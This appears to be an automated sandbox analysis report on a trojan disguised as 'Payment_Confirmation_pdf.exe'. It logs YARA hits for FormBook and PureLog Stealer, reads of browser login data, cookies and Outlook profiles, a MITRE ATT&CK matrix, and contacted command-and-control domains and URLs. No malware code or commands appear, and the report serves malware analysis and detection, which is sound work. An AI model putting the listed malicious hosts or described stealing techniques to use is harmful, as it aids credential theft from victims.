Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Users\user\AppData\Roaming\cQwRvD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment_Confirmation_pdf.exe	39%	Virustotal		Browse
Payment_Confirmation_pdf.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark
Payment_Confirmation_pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\cQwRvD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\cQwRvD.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
www.buckser.info	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.sankan-fukushi.info/aayz/	0%	Avira URL Cloud	safe
http://batit.aliyun.com/alww.html?id=00000000004252206681	0%	Avira URL Cloud	safe
http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD	0%	Avira URL Cloud	safe
https://support.lolipop.jp/hc/ja/articles/360049132953	0%	Avira URL Cloud	safe
http://www.buckser.info/xzte/	0%	Avira URL Cloud	safe
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	0%	Avira URL Cloud	safe
http://www.innovateideas.xyz/4wqa/	0%	Avira URL Cloud	safe
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	0%	Avira URL Cloud	safe
https://pepabo.com/	0%	Avira URL Cloud	safe
http://www.zxyck.net/yp7g/	0%	Avira URL Cloud	safe
http://www.innovateideas.xyz	0%	Avira URL Cloud	safe
https://static.minne.com/files/banner/minne_600x500	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.madhf.tech	103.224.182.242	true	false		high
www.zxyck.net	118.107.250.103	true	true		unknown
www.buckser.info	120.26.240.121	true	true	1%, Virustotal, Browse	unknown
www.innovateideas.xyz	209.74.77.108	true	true		unknown
www.sankan-fukushi.info	163.44.185.183	true	false		high
www.egldfi.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sankan-fukushi.info/aayz/	true	Avira URL Cloud: safe	unknown
http://www.innovateideas.xyz/4wqa/	true	Avira URL Cloud: safe	unknown
http://www.buckser.info/xzte/	true	Avira URL Cloud: safe	unknown
http://www.zxyck.net/yp7g/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
